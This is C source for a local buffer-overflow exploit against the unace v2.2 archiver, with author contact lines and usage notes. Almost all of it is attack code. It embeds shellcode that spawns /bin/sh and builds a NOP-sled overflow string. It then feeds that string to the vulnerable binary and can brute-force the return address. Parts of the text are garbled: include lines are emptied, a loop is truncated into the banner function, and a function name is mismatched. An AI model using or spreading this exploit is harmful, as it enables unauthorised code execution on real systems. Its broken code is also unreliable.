/*Local exploit for unace v2.2 by Li0n7 *Bug reported by Andreas Constantinides *contact me: Li0n7@voila.fr *visit us: ioc.fr.st *tested on slackware 9.0 *usage: ./unace-exp[-r ][-b [-s ][-d ]] *-r : try to exploit unace with specified as return address *-b: enables bruteforcing *-s: specify the first address to bruteforce *-d: the value to take away from the starting address at each bruteforcing iteration */ #include #include #include #include #include #include #define BSIZE 600 #define SIZE BSIZE*2 #define D_DIFF 1 #define D_START 0xbfffffff #define PATH "/tmp/test/exploits/src/unace" #define RET 0xbffff73a char shellcode[]= "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3" "\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; char *buffer,*ptr; void exec_culn(); int tease(); int make_string(long ret_addr); int bruteforce(long start,int diff); void banner(char *argv0); int main(int argc,char *argv[]) { char * option_list = "bd:r:s:"; int option,brute = 0,opterr = 0,diff = D_DIFF; long ret,start = D_START; banner(argv[0]); if (argc < 1) exit(-1); while((option = getopt(argc,argv,option_list)) != -1) switch(option) { case 'b': brute = 1; break; case 'd': diff = atoi(optarg); break; case 'r': ret = strtoul(optarg,NULL,0); make_string(ret); tease(); exit(0); break; case 's': start = strtoul(optarg,NULL,0); break; case '?': fprintf(stderr,"[-] option \'%c\' invalid\n",optopt); banner(argv[0]); exit(-1); } if(brute == 1) bruteforce(start,diff); return 0; } void exec_vuln() { execl(PATH,PATH,"e",buffer,NULL); } int tease() { pid_t pid; pid_t wpid; int status; pid = fork(); if ( pid == -1 ) { fprintf(stderr, " [-] %s: Failed to fork()\n", strerror(errno)); exit(13); } else if ( pid == 0 ) { exec_vuln(); } else { wpid = wait(&status); if ( wpid == -1 ) { fprintf(stderr,"[-] %s: wait()\n", strerror(errno)); return 1; } else if ( wpid != pid ) abort(); else { if ( WIFEXITED(status) ) { printf("[+] Exited: shell's ret code = %d\n", WEXITSTATUS(status)); return WEXITSTATUS(status); } else if ( WIFSIGNALED(status) ) { return WTERMSIG(status); } else { fprintf(stderr, "[-] Stopped.\n"); } } } return 1; } int make_string(long ret_addr) { int i; long ret,addr,*addr_ptr; buffer = (char *)malloc(SIZE); if(!buffer) { fprintf(stderr,"[-] Can't allocate memory, exiting...\n"); exit(-1); } ptr = buffer; memset(ptr,0x90,BSIZE-strlen(shellcode)); ptr += BSIZE-strlen(shellcode); for(i=0;i\n"); fprintf(stderr," visit us: http://www.ioc.fr.st\n"); fprintf(stderr," contact me: Li0n7[at]voila[dot]fr\n"); fprintf(stderr," usage: %s [-r ][-b [-s ][-d ]]\n\n",argv0); }

��ŷ��